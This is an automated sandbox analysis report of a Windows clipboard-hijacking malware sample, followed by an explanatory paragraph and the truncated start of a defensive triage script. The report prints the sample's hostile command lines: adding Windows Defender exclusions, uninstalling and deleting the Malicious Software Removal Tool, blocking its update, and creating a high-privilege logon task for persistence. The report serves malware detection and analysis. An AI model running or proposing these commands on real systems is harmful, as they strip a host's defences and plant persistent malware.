
Windows Analysis Report
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Analysis ID: 1543318
MD5: 330709f05491b4e01ddf2af087d4e4f3
SHA1: 0f94e0f3f7ef87df645847f84a94572192f5fc39
SHA256: 3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64native
  • SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe (PID: 1792 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe" MD5: 330709F05491B4E01DDF2AF087D4E4F3)
    • powershell.exe (PID: 2172 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WmiPrvSE.exe (PID: 2844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 5084 cmdline: "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 7004 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • cmd.exe (PID: 4076 cmdline: "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6440 cmdline: "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • reg.exe (PID: 5504 cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • SppExtComObj.exe (PID: 6848 cmdline: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe" MD5: 43D7DA08F086122E16773B9002C05B1F)
    • SgrmBroker.exe (PID: 7500 cmdline: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe" MD5: B22A88CB0DDC70FA01E392173505458C)
      • cmd.exe (PID: 7928 cmdline: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 8096 cmdline: schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest MD5: 796B784E98008854C27F4B18D287BA30)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", CommandLine: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, NewProcessName: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, OriginalFileName: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", ProcessId: 6848, ProcessName: SppExtComObj.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe", ParentImage: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe, ParentProcessId: 7500, ParentProcessName: SgrmBroker.exe, ProcessCommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", ProcessId: 7928, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe", ParentImage: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe, ParentProcessId: 7500, ParentProcessName: SgrmBroker.exe, ProcessCommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", ProcessId: 7928, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: 1099466887, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessId: 1792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe\MinimumStackCommitInBytes
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe; ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9CF1530: OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9CFDB59: HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CreateWaitableTimerExW,HeapFree,CreateWaitableTimerExW,HeapFree,HeapFree,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,WaitOnAddress,WaitOnAddress,GetLastError,CreateWaitableTimerExW,WakeByAddressSingle,WaitOnAddress,WaitOnAddress,GetLastError,WakeByAddressSingle,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,GetLastError,SetClipboardData,GlobalFree,GetLastError,GetLastError,GlobalFree,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,RevertToSelf,WakeByAddressSingle,HeapFree,CreateWaitableTimerExW,GetLastError,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9CFBF68: GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree

System Summary

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | File dump: SppExtComObj.exe.5.dr (706740224 bytes)
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DCDA50: GetProcessTimes,GetLastError,GetSystemTimes,GetLastError,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLastError,GetLastError,CloseHandle,GetLastError,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,HeapFree,HeapFree,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetLastError,K32GetModuleFileNameExW,HeapFree,HeapFree,HeapFree,GetLastError,CloseHandle,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,VirtualQueryEx,ReadProcessMemory,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,VirtualQueryEx,HeapFree,HeapFree,HeapFree,RtlFreeHeap,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DCF390: NtQueryInformationProcess,GetErrorInfo,NtQueryInformationProcess,HeapFree,HeapFree
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9CFBF68: GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DB9FF0: GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 12_2_00007FF8490639D1, 12_2_00007FF8490630E9
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code functions: 24_2_00007FF6D9DD0ED0, 24_2_00007FF6D9CF8A90, 24_2_00007FF6D9CF1680, 24_2_00007FF6D9CF7E40, 24_2_00007FF6D9DCDA50, 24_2_00007FF6D9DBFA10, 24_2_00007FF6D9DBADE0, 24_2_00007FF6D9CFAD98, 24_2_00007FF6D9CF4140, 24_2_00007FF6D9DD08F0, 24_2_00007FF6D9D4AF80, 24_2_00007FF6D9CF8B9D, 24_2_00007FF6D9DDEF40, 24_2_00007FF6D9CFBF68, 24_2_00007FF6D9D50300, 24_2_00007FF6D9CFAEE2, 24_2_00007FF6D9DE0AA0, 24_2_00007FF6D9D2DAB0, 24_2_00007FF6D9CFD2B0, 24_2_00007FF6D9CF32A0, 24_2_00007FF6D9D03A50, 24_2_00007FF6D9D0C650, 24_2_00007FF6D9CF3210, 24_2_00007FF6D9DC7230, 24_2_00007FF6D9D08A00, 24_2_00007FF6D9D0EE10, 24_2_00007FF6D9D011D0, 24_2_00007FF6D9D085F0, 24_2_00007FF6D9DC45D0, 24_2_00007FF6D9D0DDA0, 24_2_00007FF6D9D40DB0, 24_2_00007FF6D9DE0180, 24_2_00007FF6D9D06140, 24_2_00007FF6D9CF4970, 24_2_00007FF6D9D2A130, 24_2_00007FF6D9CF1530, 24_2_00007FF6D9D2B0F0, 24_2_00007FF6D9D114F0, 24_2_00007FF6D9DC64C0, 24_2_00007FF6D9D24CC0, 24_2_00007FF6D9CF4CE0, 24_2_00007FF6D9D29CA0, 24_2_00007FF6D9D244A0, 24_2_00007FF6D9DE6480, 24_2_00007FF6D9D020A0, 24_2_00007FF6D9CF2C50, 24_2_00007FF6D9DDF860, 24_2_00007FF6D9D30060, 24_2_00007FF6D9CF2C70, 24_2_00007FF6D9DBB050, 24_2_00007FF6D9D34020, 24_2_00007FF6D9DC6400, 24_2_00007FF6D9DCC3E0, 24_2_00007FF6D9D2D3C0, 24_2_00007FF6D9D43BC0, 24_2_00007FF6D9D2AFA0, 24_2_00007FF6D9D07B80, 24_2_00007FF6D9D0D380, 24_2_00007FF6D9D50F90, 24_2_00007FF6D9CF4B50, 24_2_00007FF6D9CFDB59
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: classification engine | Classification label: mal100.evad.winEXE@27/6@0/0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DD0ED0: CoCreateInstance,SysFreeString,CoSetProxyBlanket,GetErrorInfo,GetErrorInfo,SysFreeString,GetErrorInfo
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | File created: C:\Users\Public\Pictures_Old
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:304:WilStaging_02
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Mutant created: \Sessions\1\BaseNamedObjects\HgSyVtdfIS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urbrehpo.yuf.ps1
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
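The process chain above is the whole install sequence: Defender is told to ignore %ProgramData%, C:\Users\Public and every .exe; the Malicious Software Removal Tool (KB890830 is MSRT) is uninstalled, its binary deleted and the DontOfferThroughWUAU policy set so Windows Update stops delivering it; the payloads are dropped under ProgramData\Fonts_Backup and Users\Public\Pictures_Old with the names of Windows components; and a logon task named TMPSYSUPD relaunches SgrmBroker.exe at highest run level. The PowerShell below is an added triage example written for this page, not part of the Joe Sandbox report or of the sample. It only reads the artefacts the rows above name (paths, task name, registry value, mutex name), so it is safe to run on a suspect host; the one assumption not taken from the report is that Defender records the exclusion change as event 5007 in its Operational log with the changed registry value in the message text.

```powershell
# Added triage example for this report (not sample code, not Joe Sandbox output).
# Run from an elevated PowerShell in the interactive session the sample ran in;
# the mutex check only sees that session's local object namespace.
function Invoke-CerbuSampleTriage {
    [CmdletBinding()]
    param()

    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Defender exclusions written by
    #    Add-MpPreference -ExclusionPath @($env:ProgramData,'C:\Users\Public') -ExclusionExtension '.exe'
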